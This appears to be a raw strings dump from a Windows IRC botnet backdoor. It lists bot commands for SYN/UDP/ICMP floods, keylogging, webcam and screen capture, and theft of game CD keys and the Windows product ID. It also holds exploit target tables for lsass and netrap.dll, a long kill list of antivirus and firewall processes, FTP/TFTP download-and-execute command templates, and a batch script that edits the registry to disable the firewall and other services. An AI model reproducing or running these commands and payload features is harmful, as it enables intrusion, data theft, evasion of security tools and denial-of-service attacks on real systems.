rcpt to: <%s>
subject: %s
from: %s
web.email
%s %s flooding: (%s:%s) for %s seconds.
rape.tf
ICMP.dll not available
Sending %d pings to %s. packet size: %d, timeout: %d(ms).
rape.pf
Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).
rape.uf
%s Exploitation started on %s:%d waiting %d seconds for %d minutes using %d threads.
[%s] * %s %s
irc.clone.ac
[%s] <%s> %s
irc.clone.pm
Failed to start scan thread, error: <%d>.
Port scan started: %s:%d with delay: %d(ms).
root.ps
Failed to start redirection thread, error: <%d>.
TCP redirect created from: %s:%d to: %s:%d.
server.rd
Failed to start transfer thread, error: <%d>.
Downloading URL: %s to: %s.
web.dl.g
rape.sf
Failed to start clone thread, error: <%d>.
Created on %s:%d, in channel %s.
irc.clone.st
Flooding: (%s) for %s seconds.
rape.ic
Rename: '%s' to: '%s'.
sys.rn
Failed to start search thread, error: <%d>.
Searching for file: %s in: %s.
sys.ff
] (exec.p
Commands: %s
Couldn't execute file.
Failed to start download thread, error: <%d>.
Downloading update from: %s.
%s%s.exe
web.dl.up
irc.de
Repeat not allowed in command line: %s
Repeat: %s
irc.rp
PART %s
irc.clone.p
JOIN %s %s
irc.clone.j
Nick (%s): %s
irc.clone.ni
Mode (%s): %s
MODE %s
irc.clone.m
Raw (%s): %s
irc.clone.raw
Mode change: %s
irc.cy
Action: %s: %s.
ACTION %s
irc.ac
Privmsg: %s: %s.
irc.pm
Alias added: %s.
irc.aa
Gethost: %s.
Gethost: %s, Command: %s
%s %s %s :%s
irc.gh
Error while capturing amateur video from webcam.
Amateur video saved to: %s.
Invalid parameters for webcam capture.
Error while capturing from webcam.
Webcam capture saved to: %s.
Driver #%d - %s - %s.
Screen capture saved to: %s.
sys.cap
Failed to load advapi32.dll or netapi32.dll.
sys.net
.n.z.m. (keylog.p.l.g) .
. Failed to start logging thread, error: <%d>.
. Key logger active.
. No key logger thread found.
. Key logger stopped. (%d thread(s) stopped.)
sys.kl
Carnivore stopped. (%d thread(s) stopped.)
Failed to start sniffer thread, error: <%d>.
Read file failed: %s
Read file complete: %s
sys.rf
sys.cmd
mirc.cmd
Failed to start connection thread, error: <%d>.
URL: %s.
web.v
List: %s
sys.fl
Send File: %s, User: %s.
mirc.dcc.get
Deleted '%s'.
sys.del
Failed to terminate process ID: %s
Process killed ID: %s
sys.kpid
Failed to terminate process: %s
Process killed: %s
sys.kpn
Lookup: %s -> %s.
irc.dns
Server changed to: '%s'.
irc.se
15 Couldn't open file: %s
15 File opened: %s
Prefix changed to: '%c'.
irc.pr
irc.clone.rn
irc.clone.q
Failed to kill thread: %s.
Killed thread: %s.
Stopped: %d thread(s).
irc.tk
IRC Raw: %s.
irc.raw
Parted channel: '%s'.
irc.pt
Joined channel: '%s'.
Nick changed to: '%s'.
Failed to start scan, port is invalid.
%s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
Already %d scanning threads. Too many specified.
root.mass
Failed to start server thread, error: <%d>.
server.tf.on
server.web.on
root.cip
Failed to load dnsapi.dll.
irc.fdns
irc.farp
com.gc
com.getclip
Login list complete.
%d. %s
-[Login List]-
irc.who
[CMD]
sys.cmd.off
sys.cmd.on
sys.dll
sys.di
Uptime: %s.
sys.up
] (cdkeys.p
sys.key
Failed to start listing thread, error: <%d>.
sys.ps.on
irc.rmb
sys.si
Failed to start flood thread, error: <%d>.
Flooding: (%s:%s) for %s seconds.
rape.ssf
sys.ni
irc.clg
irc.lg.on
irc.al
Failed to start list thread, error: <%d>.
irc.tl
Bot ID: %s.
irc.id
Status: Ready. Bot Uptime: %s.
irc.st
QUIT :%s
irc.dc
irc.rc
root.st
root.stats
root.stop
sys.ld.stop
irc.clone.off
sys.ps.off
sys.ff.off
server.tf.off
rape.pf.off
UDP flood
rape.uf.off
rape.sf.off
rape.df.off
TCP redirect
server.rd.off
irc.lg.off
server.web.off
server.s4.off
server.s4.on
ld.off
sys.ld.off
ld.on
sys.ld.on
irc.ver
Invalid login slot number: %d.
No user logged in at slot: %d.
irc.lo
irc.di
Random nick change: %s
irc.rn
$rndnick
User: %s logged in.
Password accepted.
*Failed host auth by: (%s!%s).
*Failed pass auth by: (%s!%s).
NOTICE %s :You've been logged.
NOTICE %s :Nice try, idiot. (%s!%s).
irc.li
Chat failed by unauthorized user: %s.
Chat already active with user: %s.
Failed to start chat thread, error: <%d>.
Chat from user: %s.
Receive file: '%s' failed from unauthorized user: %s.
NOTICE %s :
PING %s
%s has just versioned me.
VERSION %s
Receive file: '%s' from user: %s.
User: %s logged out.
Joined channel: %s.
:%s%s
NICK
NOTICE %s :%s
User %s logged out.
PONG %s
i11r54n4.exe
irun4.exe
d3dupdate.exe
rate.exe
ssate.exe
winsys.exe
winupd.exe
SysMonXP.exe
bbeagle.exe
Penis32.exe
mscvb32.exe
sysinfo.exe
PandaAVEngine.exe
F-AGOBOT.EXE
HIJACKTHIS.EXE
_AVPM.EXE
_AVPCC.EXE
_AVP32.EXE
ZONEALARM.EXE
ZONALM2601.EXE
ZATUTOR.EXE
ZAPSETUP3001.EXE
ZAPRO.EXE
XPF202EN.EXE
WYVERNWORKSFIREWALL.EXE
WUPDT.EXE
WUPDATER.EXE
WSBGATE.EXE
WRCTRL.EXE
WRADMIN.EXE
WNT.EXE
WNAD.EXE
WKUFIND.EXE
WINUPDATE.EXE
WINTSK32.EXE
WINSTART001.EXE
WINSTART.EXE
WINSSK32.EXE
WINSERVN.EXE
WINRECON.EXE
WINPPR32.EXE
WINNET.EXE
WINMAIN.EXE
WINLOGIN.EXE
WININITX.EXE
WININIT.EXE
WININETD.EXE
WINDOWS.EXE
WINDOW.EXE
WINACTIVE.EXE
WIN32US.EXE
WIN32.EXE
WIN-BUGSFIX.EXE
WIMMUN32.EXE
WHOSWATCHINGME.EXE
WGFE95.EXE
WFINDV32.EXE
WEBTRAP.EXE
WEBSCANX.EXE
WEBDAV.EXE
WATCHDOG.EXE
W9X.EXE
W32DSM89.EXE
VSWINPERSE.EXE
VSWINNTSE.EXE
VSWIN9XE.EXE
VSSTAT.EXE
VSMON.EXE
VSMAIN.EXE
VSISETUP.EXE
VSHWIN32.EXE
VSECOMR.EXE
VSCHED.EXE
VSCENU6.02D30.EXE
VSCAN40.EXE
VPTRAY.EXE
VPFW30S.EXE
VPC42.EXE
VPC32.EXE
VNPC3000.EXE
VNLAN300.EXE
VIRUSMDPERSONALFIREWALL.EXE
VIR-HELP.EXE
VFSETUP.EXE
VETTRAY.EXE
VET95.EXE
VET32.EXE
VCSETUP.EXE
VBWINNTW.EXE
VBWIN9X.EXE
VBUST.EXE
VBCONS.EXE
VBCMSERV.EXE
UTPOST.EXE
UPGRAD.EXE
UPDATE.EXE
UPDAT.EXE
UNDOBOOT.EXE
TVTMD.EXE
TVMD.EXE
TSADBOT.EXE
TROJANTRAP3.EXE
TRJSETUP.EXE
TRJSCAN.EXE
TRICKLER.EXE
TRACERT.EXE
TITANINXP.EXE
TITANIN.EXE
TGBOB.EXE
TFAK5.EXE
TFAK.EXE
TEEKIDS.EXE
TDS2-NT.EXE
TDS2-98.EXE
TDS-3.EXE
TCM.EXE
TCA.EXE
TC.EXE
TBSCAN.EXE
TAUMON.EXE
TASKMON.EXE
TASKMO.EXE
TASKMG.EXE
SYSUPD.EXE
SYSTEM32.EXE
SYSTEM.EXE
SYSEDIT.EXE
SYMTRAY.EXE
SYMPROXYSVC.EXE
SWEEPNET.SWEEPSRV.SYS.SWNETSUP.EXE
SWEEP95.EXE
SVSHOST.EXE
SVCHOSTS.EXE
SVCHOSTC.EXE
SVC.EXE
SUPPORTER5.EXE
SUPPORT.EXE
SUPFTRL.EXE
STCLOADER.EXE
START.EXE
ST2.EXE
SSG_4104.EXE
SSGRATE.EXE
SS3EDIT.EXE
SRNG.EXE
SREXE.EXE
SPYXX.EXE
SPOOLSV32.EXE
SPOOLCV.EXE
SPOLER.EXE
SPHINX.EXE
SPF.EXE
SPERM.EXE
SOFI.EXE
SOAP.EXE
SMSS32.EXE
SMS.EXE
SMC.EXE
SHOWBEHIND.EXE
SHN.EXE
SHELLSPYINSTALL.EXE
SH.EXE
SGSSFW32.EXE
SFC.EXE
SETUP_FLOWPROTECTOR_US.EXE
SETUPVAMEEVAL.EXE
SERVLCES.EXE
SERVLCE.EXE
SERVICE.EXE
SERV95.EXE
SD.EXE
SCVHOST.EXE
SCRSVR.EXE
SCRSCAN.EXE
SCANPM.EXE
SCAN95.EXE
SCAN32.EXE
SCAM32.EXE
SC.EXE
SBSERV.EXE
SAVENOW.EXE
SAVE.EXE
SAHAGENT.EXE
SAFEWEB.EXE
RUXDLL32.EXE
RUNDLL16.EXE
RUNDLL.EXE
RUN32DLL.EXE
RULAUNCH.EXE
RTVSCN95.EXE
RTVSCAN.EXE
RSHELL.EXE
RRGUARD.EXE
RESCUE32.EXE
RESCUE.EXE
REGEDT32.EXE
REGEDIT.EXE
REGED.EXE
REALMON.EXE
RCSYNC.EXE
RB32.EXE
RAY.EXE
RAV8WIN32ENG.EXE
RAV7WIN.EXE
RAV7.EXE
RAPAPP.EXE
QSERVER.EXE
QCONSOLE.EXE
PVIEW95.EXE
PUSSY.EXE
PURGE.EXE
PSPF.EXE
PROTECTX.EXE
PROPORT.EXE
PROGRAMAUDITOR.EXE
PROCEXPLORERV1.0.EXE
PROCESSMONITOR.EXE
PROCDUMP.EXE
PRMVR.EXE
PRMT.EXE
PRIZESURFER.EXE
PPVSTOP.EXE
PPTBC.EXE
PPINUPDT.EXE
POWERSCAN.EXE
PORTMONITOR.EXE
PORTDETECTIVE.EXE
POPSCAN.EXE
POPROXY.EXE
POP3TRAP.EXE
PLATIN.EXE
PINGSCAN.EXE
PGMONITR.EXE
PFWADMIN.EXE
PF2.EXE
PERSWF.EXE
PERSFW.EXE
PERISCOPE.EXE
PENIS.EXE
PDSETUP.EXE
PCSCAN.EXE
PCIP10117_0.EXE
PCFWALLICON.EXE
PCDSETUP.EXE
PCCWIN98.EXE
PCCWIN97.EXE
PCCNTMON.EXE
PCCIOMON.EXE
PCC2K_76_1436.EXE
PCC2002S902.EXE
PAVW.EXE
PAVSCHED.EXE
PAVPROXY.EXE
PAVCL.EXE
PATCH.EXE
PANIXK.EXE
PADMIN.EXE
OUTPOSTPROINSTALL.EXE
OUTPOSTINSTALL.EXE
OUTPOST.EXE
OTFIX.EXE
OSTRONET.EXE
OPTIMIZE.EXE
ONSRVR.EXE
OLLYDBG.EXE
NWTOOL16.EXE
NWSERVICE.EXE
NWINST4.EXE
NVSVC32.EXE
NVC95.EXE
NVARCH16.EXE
NUPGRADE.EXE
NUI.EXE
NTXconfig.EXE
NTVDM.EXE
NTRTSCAN.EXE
NT.EXE
NSUPDATE.EXE
NSTASK32.EXE
NSSYS32.EXE
NSCHED32.EXE
NPSSVC.EXE
NPSCHECK.EXE
NPROTECT.EXE
NPFMESSENGER.EXE
NPF40_TW_98_NT_ME_2K.EXE
NOTSTART.EXE
NORTON_INTERNET_SECU_3.0_407.EXE
NORMIST.EXE
NOD32.EXE
NMAIN.EXE
NISUM.EXE
NISSERV.EXE
NETUTILS.EXE
NETSTAT.EXE
NETSPYHUNTER-1.2.EXE
NETSCANPRO.EXE
NETMON.EXE
NETINFO.EXE
NETD32.EXE
NETARMOR.EXE
NEOWATCHLOG.EXE
NEOMONITOR.EXE
NDD32.EXE
NCINST4.EXE
NC2000.EXE
NAVWNT.EXE
NAVW32.EXE
NAVSTUB.EXE
NAVNT.EXE
NAVLU32.EXE
NAVENGNAVEX15.NAVLU32.EXE
NAVDX.EXE
NAVAPW32.EXE
NAVAPSVC.EXE
NAVAP.NAVAPSVC.EXE
AUTO-PROTECT.NAV80TRY.EXE
NAV.EXE
N32SCANW.EXE
MWATCH.EXE
MU0311AD.EXE
MSVXD.EXE
MSSYS.EXE
MSSMMC32.EXE
MSMSGRI32.EXE
MSMGT.EXE
MSLAUGH.EXE
MSINFO32.EXE
MSIEXEC16.EXE
MSDOS.EXE
MSDM.EXE
MSCONFIG.EXE
MSCMAN.EXE
MSCCN32.EXE
MSCACHE.EXE
MSBLAST.EXE
MSBB.EXE
MSAPP.EXE
MRFLUX.EXE
MPFTRAY.EXE
MPFSERVICE.EXE
MPFAGENT.EXE
MOSTAT.EXE
MOOLIVE.EXE
MONITOR.EXE
MMOD.EXE
MINILOG.EXE
MGUI.EXE
MGHTML.EXE
MGAVRTE.EXE
MGAVRTCL.EXE
MFWENG3.02D30.EXE
MFW2EN.EXE
MFIN32.EXE
MD.EXE
MCVSSHLD.EXE
MCVSRTE.EXE
MCUPDATE.EXE
MCTOOL.EXE
MCSHIELD.EXE
MCMNHDLR.EXE
MCAGENT.EXE
MAPISVC32.EXE
LUSPT.EXE
LUINIT.EXE
LUCOMSERVER.EXE
LUAU.EXE
LUALL.EXE
LSETUP.EXE
LORDPE.EXE
LOOKOUT.EXE
LOCKDOWN2000.EXE
LOCKDOWN.EXE
LOCALNET.EXE
LOADER.EXE
LNETINFO.EXE
LDSCAN.EXE
LDPROMENU.EXE
LDPRO.EXE
LDNETMON.EXE
LAUNCHER.EXE
KILLPROCESSSETUP161.EXE
KERNEL32.EXE
KERIO-WRP-421-EN-WIN.EXE
KERIO-WRL-421-EN-WIN.EXE
KERIO-PF-213-EN-WIN.EXE
KEENVALUE.EXE
KAZZA.EXE
KAVPF.EXE
KAVPERS40ENG.EXE
KAVLITE40ENG.EXE
JEDI.EXE
JDBGMRG.EXE
JAMMER.EXE
ISTSVC.EXE
ISRV95.EXE
ISASS.EXE
IRIS.EXE
IPARMOR.EXE
IOMON98.EXE
INTREN.EXE
INTDEL.EXE
INIT.EXE
INFWIN.EXE
INFUS.EXE
INETLNFO.EXE
IFW2000.EXE
IFACE.EXE
IEXPLORER.EXE
IEDRIVER.EXE
IEDLL.EXE
IDLE.EXE
ICSUPPNT.EXE
ICSUPP95.EXE
ICMON.EXE
ICLOADNT.EXE
ICLOAD95.EXE
IBMAVSP.EXE
IBMASN.EXE
IAMSTATS.EXE
IAMSERV.EXE
IAMAPP.EXE
HXIUL.EXE
HXDL.EXE
HWPE.EXE
HTPATCH.EXE
HTLOG.EXE
HOTPATCH.EXE
HOTACTIO.EXE
HBSRV.EXE
HBINST.EXE
HACKTRACERSETUP.EXE
GUARDDOG.EXE
GUARD.EXE
GMT.EXE
GENERICS.EXE
GBPOLL.EXE
GBMENU.EXE
GATOR.EXE
FSMB32.EXE
FSMA32.EXE
FSM32.EXE
FSGK32.EXE
FSAV95.EXE
FSAV530WTBYB.EXE
FSAV530STBYB.EXE
FSAV32.EXE
FSAV.EXE
FSAA.EXE
FRW.EXE
FPROT.EXE
FP-WIN_TRIAL.EXE
FP-WIN.EXE
FNRB32.EXE
FLOWPROTECTOR.EXE
FIREWALL.EXE
FINDVIRU.EXE
FIH32.EXE
FCH32.EXE
FAST.EXE
FAMEH32.EXE
F-STOPW.EXE
F-PROT95.EXE
F-PROT.EXE
F-AGNT95.EXE
EXPLORE.EXE
EXPERT.EXE
EXE.AVXW.EXE
EXANTIVIRUS-CNET.EXE
EVPN.EXE
ETRUSTCIPE.EXE
ETHEREAL.EXE
ESPWATCH.EXE
ESCANV95.EXE
ESCANHNT.EXE
ESCANH95.EXE
ESAFE.EXE
ENT.EXE
EMSW.EXE
EFPEADM.EXE
ECENGINE.EXE
DVP95_0.EXE
DVP95.EXE
DSSAGENT.EXE
DRWEBUPW.EXE
DRWEB32.EXE
DRWATSON.EXE
DPPS2.EXE
DPFSETUP.EXE
DPF.EXE
DOORS.EXE
DLLREG.EXE
DLLCACHE.EXE
DIVX.EXE
DEPUTY.EXE
DEFWATCH.EXE
DEFSCANGUI.EXE
DEFALERT.EXE
DCOMX.EXE
DATEMANAGER.EXE
Claw95.EXE
CWNTDWMO.EXE
CWNB181.EXE
CV.EXE
CTRL.EXE
CPFNT206.EXE
CPF9X206.EXE
CPD.EXE
CONNECTIONMONITOR.EXE
CMON016.EXE
CMGRDIAN.EXE
CMESYS.EXE
CMD32.EXE
CLICK.EXE
CLEANPC.EXE
CLEANER3.EXE
CLEANER.EXE
CLEAN.EXE
CLAW95CF.EXE
CFINET32.EXE
CFINET.EXE
CFIAUDIT.EXE
CFIADMIN.EXE
CFGWIZ.EXE
CFD.EXE
CDP.EXE
CCPXYSVC.EXE
CCEVTMGR.EXE
CCAPP.EXE
BVT.EXE
BUNDLE.EXE
BS120.EXE
BRASIL.EXE
BPC.EXE
BORG2.EXE
BOOTWARN.EXE
BOOTCONF.EXE
BLSS.EXE
BLACKICE.EXE
BLACKD.EXE
BISP.EXE
BIPCPEVALSETUP.EXE
BIPCP.EXE
BIDSERVER.EXE
BIDEF.EXE
BELT.EXE
BEAGLE.EXE
BD_PROFESSIONAL.EXE
BARGAINS.EXE
BACKWEB.EXE
AVXQUAR.EXE
AVXMONITORNT.EXE
AVXMONITOR9X.EXE
AVWUPSRV.EXE
AVWUPD32.EXE
AVWUPD.EXE
AVWINNT.EXE
AVWIN95.EXE
AVSYNMGR.EXE
AVSCHED32.EXE
AVPUPD.EXE
AVPTC32.EXE
AVPM.EXE
AVPDOS32.EXE
AVPCC.EXE
AVP32.EXE
AVP.EXE
AVNT.EXE
AVLTMAIN.EXE
AVKWCTl9.EXE
AVKSERVICE.EXE
AVKSERV.EXE
AVKPOP.EXE
AVGW.EXE
AVGUARD.EXE
AVGSERV9.EXE
AVGSERV.EXE
AVGNT.EXE
AVGCTRL.EXE
AVGCC32.EXE
AVE32.EXE
AVCONSOL.EXE
AUTOUPDATE.EXE
AUTOTRACE.EXE
AUTODOWN.EXE
AUPDATE.EXE
AU.EXE
ATWATCH.EXE
ATUPDATER.EXE
ATRO55EN.EXE
ATGUARD.EXE
ATCON.EXE
ARR.EXE
APVXDWIN.EXE
APLICA32.EXE
APIMONITOR.EXE
ANTS.EXE
ANTIVIRUS.EXE
ANTI-TROJAN.EXE
AMON9X.EXE
ALOGSERV.EXE
ALEVIR.EXE
ALERTSVC.EXE
AGENTW.EXE
AGENTSVR.EXE
ADVXDWIN.EXE
ADAWARE.EXE
ACKWIN32.EXE
%s (%d)
[%s]|
[%d]%s
IP: %s Port: %d is open.
Scanning IP: %s, Port: %d.
Netapi32.dll couldn't be loaded.
Failed to delete '%S' share.
Share '%S' deleted.
Failed to delete '%s' share.
Share '%s' deleted.
Advapi32.dll couldn't be loaded.
Failed to open IPC$ Restriction registry key.
Failed to open DCOM registry key.
Failed to add '%s' share.
Share '%s' added.
Failed to open IPC$ restriction registry key.
tPTF.exe -i get
%s: No %s thread found.
%s: %s stopped. (%d thread(s) stopped.)
zcÁ
[04-12-2015 06:36:53]
[04-12-2015 06:36:52]
[04-12-2015 06:36:51]
%System%\explore.exe
TransactNamedPipe
PeekNamedPipe
CreatePipe
GetCPInfo
.text
`.rdata
@.data
.sxdata
4]!.nt
.LfJ2O0
KERNEL32.DLL
WS2_32.dll
\C$\123456111111111111111.doc
Windows 2000 2195
Windows 2000 5.0
\\192.168.1.210\IPC$
\PIPE\
explore.exe_464_rwx_00400000_0034C000:
GWSSh
t1SSSSh
PSSh<LA
GET / HTTP/1.0
Host: %s
Authorization: Negotiate %s
__MSVCRT_HEAP_SELECT
Send error: <%d>.
ddos.random
ddos.ack
ddos.syn
Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.
Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).
Error: setsockopt() failed, returned: <%d>.
Error: socket() failed, returned: <%d>.
] (tcp.p
] (keylog.p
[%d-%d-%d %d:%d:%d] %s
%s (Return) (%s)
%s (Buffer full) (%s)
%s (Changed Windows: %s)
:.login
:,login
:!login
:@login
:$login
:%login
:^login
:&login
:*login
:-login
: login
:/login
:\login
:=login
:?login
:'login
:`login
:~login
: login
:.auth
:.hashin
:.secure
:.syn
:%syn
CDKey
JOIN #
NICK
now an IRC Operator
paypal.com
PAYPAL.COM
Error: recv() failed, returned: <%d>
Suspicious %s packet from: %s:%d - %s.
Error: WSAIoctl() failed, returned: <%d>.
Error: bind() failed, returned: <%d>.
] (%s.p
trying to root %s
] (tPTF.p
transfer complete to IP: %s
\\%s\pipe\epmapper
Windows for Workgroups 3.1a
WinXP Professional [universal] lsass.exe
Win2k Professional [universal] netrap.dll
Win2k Advanced Server [SP4] netrap.dll
echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
tftp -i %s get %s
\\%s\ipc$
] (%s.e
cmd /k echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo quit >> o &ftp -n -s:o &del /F /Q o &%s
Windows uk 2k3 ee sp0 24
Windows uk 2k3 ee sp0 23
Windows uk 2k3 ee sp0 22
Windows uk 2k3 ee sp0 21
Windows uk 2k3 ee sp0 20
Windows uk 2k3 ee sp0 19
Windows uk 2k3 ee sp0 18
Windows uk 2k3 ee sp0 17
Windows uk 2k3 ee sp0 16
Windows uk 2k3 ee sp0 15
Windows uk 2k3 ee sp0 14
Windows uk 2k3 ee sp0 13
Windows uk 2k3 ee sp0 12
Windows uk 2k3 ee sp0 11
Windows uk 2k3 ee sp0 10
Windows uk 2k3 ee sp0 9
Windows uk 2k3 ee sp0 8
Windows uk 2k3 ee sp0 7
Windows uk 2k3 ee sp0 6
Windows uk 2k3 ee sp0 5
Windows uk 2k3 ee sp0 4
Windows uk 2k3 ee sp0 3
Windows uk 2k3 ee sp0 2
Windows uk 2k3 ee sp0 1
Windows uk 2k3 se sp0 24
Windows uk 2k3 se sp0 23
Windows uk 2k3 se sp0 22
Windows uk 2k3 se sp0 21
Windows uk 2k3 se sp0 20
Windows uk 2k3 se sp0 19
Windows uk 2k3 se sp0 18
Windows uk 2k3 se sp0 17
Windows uk 2k3 se sp0 16
Windows uk 2k3 se sp0 15
Windows uk 2k3 se sp0 14
Windows uk 2k3 se sp0 13
Windows uk 2k3 se sp0 12
Windows uk 2k3 se sp0 11
Windows uk 2k3 se sp0 10
Windows uk 2k3 se sp0 9
Windows uk 2k3 se sp0 8
Windows uk 2k3 se sp0 7
Windows uk 2k3 se sp0 6
Windows uk 2k3 se sp0 5
Windows uk 2k3 se sp0 4
Windows uk 2k3 se sp0 3
Windows uk 2k3 se sp0 2
Windows uk 2k3 se sp0 1
Windows uk xp pro sp1 25
Windows uk xp pro sp1 24
Windows uk xp pro sp1 23
Windows uk xp pro sp1 22
Windows uk xp pro sp1 21
Windows uk xp pro sp1 20
Windows uk xp pro sp1 19
Windows uk xp pro sp1 18
Windows uk xp pro sp1 17
Windows uk xp pro sp1 16
Windows uk xp pro sp1 15
Windows uk xp pro sp1 14
Windows uk xp pro sp1 13
Windows uk xp pro sp1 12
Windows uk xp pro sp1 11
Windows uk xp pro sp1 10
Windows uk xp pro sp1 9
Windows uk xp pro sp1 8
Windows uk xp pro sp1 7
Windows uk xp pro sp1 6
Windows uk xp pro sp1 5
Windows uk xp pro sp1 4
Windows uk xp pro sp1 3
Windows uk xp pro sp1 2
Windows uk xp pro sp1 1
Windows 2000 SP4 GER FAT32
Windows nl sp1 23
Windows nl sp1 22
Windows nl sp1 21
Windows nl sp1 20
Windows nl sp1 19
Windows nl sp1 18
Windows nl sp1 17
Windows nl sp1 16
Windows nl sp1 15
Windows nl sp1 14
Windows nl sp1 13
Windows nl sp1 12
Windows nl sp1 11
Windows nl sp1 10
Windows nl sp1 9
Windows nl sp1 8
Windows nl sp1 7
Windows nl sp1 6
Windows nl sp1 5
Windows nl sp1 4
Windows nl sp1 3
Windows nl sp1 2
Windows nl sp1 1
Windows XP SP0 1 ENG
Windows XP SP0 1 GER NL IT FR
\\%s\pipe\wkssvc
%s, port:%d now executing %s on remote machine.
200 PORT command successful.
%s.%s.%s.%s
PORT
425 Passive not supported on this server
215 NzmxFtpd
331 Password required
%s %s
220 NzmxFtpd 0wns j0
] (httpd.p
Error: server failed, returned: <%d>.
HTTP/1.0 200 OK
Content-Type: %s
Date: %s %s GMT
Last-Modified: %s %s GMT
Expires: %s %s GMT
Failed to start worker thread, error: <%d>.
Worker thread of server thread: %d.
PRIVMSG %s :Found %s Files and %s Directories
<TD WIDTH="%d"><CODE>%s</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>%dk</CODE></TD>
"><CODE>%s</CODE></A>
PRIVMSG %s :%-31s %-21s (%s bytes)
<TD WIDTH="%d" ALIGN="right"><CODE>-</CODE></TD>
"><CODE>%s/</CODE></A>
%s%s/
<TD WIDTH="%d"><A HREF="
PRIVMSG %s :%-31s %-21s
%2.2d/%2.2d/M %2.2d:%2.2d %s
<TD COLSPAN="3"><A HREF="%s"><CODE>Parent Directory</CODE></A></TD>
Searching for: %s
<TD WIDTH="%d"><CODE>Name</CODE></TD>
<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>
<TD WIDTH="%d" ALIGN="right"><CODE>Size</CODE></TD>
<H1>Index of %s</H1>
<TITLE>Index of %s</TITLE>
PRIVMSG %s :Searching for: %s
%s %s HTTP/1.1
Referer: %s
transfer to %s
, info: (%s).
File not found: %s (%s).
Failed to open file: %s.
Total: %d in %s.
%s: %d,
] (portscan.p
Current IP: %s.
Failed to start server, error: <%d>.
Server listening on IP: %s:%d, Directory: %s\.
] (PTF.p
Server started on Port: %d, File: %s, Request: %s.
%d.%d.%d.%d
IP: %s, Port %d is open.
IP: %s:%d, Scan thread: %d, Sub-thread: %d.
Finished at %s:%d after %d minute(s) of scanning.
%s:%d, Scan thread: %d, Sub-thread: %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Failed to start connection thread, error: <%d>.
Client connection to IP: %s:%d, Server thread: %d.
Failed to start server on Port %d.
Failed to start client thread, error: <%d>.
Client connection from IP: %s:%d, Server thread: %d.
Server started on: %s:%d.
Error: Failed to connect to target, returned: <%d>.
Error: Failed to open socket(), returned: <%d>.
Authentication failed. Remote userid: %s != %s.
Key3=
Key2=
Key1=
nwncdkey.ini
base\mp\sof2key
Chrome
Software\Techland\Chrome
Software\Electronic Arts\EA Sports\Nascar Racing 2003\ergc
Software\Electronic Arts\EA Sports\Nascar Racing 2002\ergc
Software\Electronic Arts\EA Sports\NHL 2003\ergc
Software\Electronic Arts\EA Sports\NHL 2002\ergc
Software\Electronic Arts\EA Sports\FIFA 2003\ergc
Software\Electronic Arts\EA Sports\FIFA 2002\ergc
Global Operations
Software\Electronic Arts\EA GAMES\Global Operations\ergc
Microsoft Windows Product ID
Software\Microsoft\Windows\CurrentVersion
prvkey
CDKey
%s\%s
%s CD Key: (%s).
Files found: %d.
Searching for file: %s.
Found: %s\%s
avicap32.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
iphlpapi.dll
dnsapi.dll
netapi32.dll
icmp.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
gdi32.dll
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
GetKeyState
GetAsyncKeyState
ExitWindowsEx
user32.dll
kernel32.dll
Avicap32.dll failed. <%d>
Odbc32.dll failed. <%d>
Shell32.dll failed. <%d>
Mpr32.dll failed. <%d>
Iphlpapi.dll failed. <%d>
Dnsapi.dll failed. <%d>
Netapi32.dll failed. <%d>
Icmp.dll failed. <%d>
Wininet.dll failed. <%d>
Ws2_32.dll failed. <%d>
Gdi32.dll failed. <%d>
Advapi32.dll failed. <%d>
User32.dll failed. <%d>
Kernel32.dll failed. <%d>
%s Error: %s <%d>.
explorer.exe
%%comspec%% /c %s %s
del "%s"
%sdel.bat
c:\a.bat
Echo REGEDIT4>%temp%\1.reg
Echo.>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]>>%temp%\1.reg
Echo "TransportBindName"="">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]>>%temp%\1.reg
Echo "Start"=dword:00000004>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole]>>%temp%\1.reg
Echo "EnableDCOM"="N">>%temp%\1.reg
Echo "EnableRemoteConnect"="N">>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]>>%temp%\1.reg
Echo "restrictanonymous"=dword:00000001>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\PCT1.0\Server]>>%temp%\1.reg
Echo "Enabled"=hex:00>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>%temp%\1.reg
Echo "AutoShareWks"=dword:00000000>>%temp%\1.reg
Echo "AutoShareServer"=dword:00000000>>%temp%\1.reg
Echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]>>%temp%\1.reg
Echo "NameServer"="">>%temp%\1.reg
Echo "ForwardBroadcasts"=dword:00000000>>%temp%\1.reg
Echo "IPEnableRouter"=dword:00000000>>%temp%\1.reg
Echo "Domain"="">>%temp%\1.reg
Echo "SearchList"="">>%temp%\1.reg
Echo "UseDomainNameDevolution"=dword:00000001>>%temp%\1.reg
Echo "EnableICMPRedirect"=dword:00000000>>%temp%\1.reg
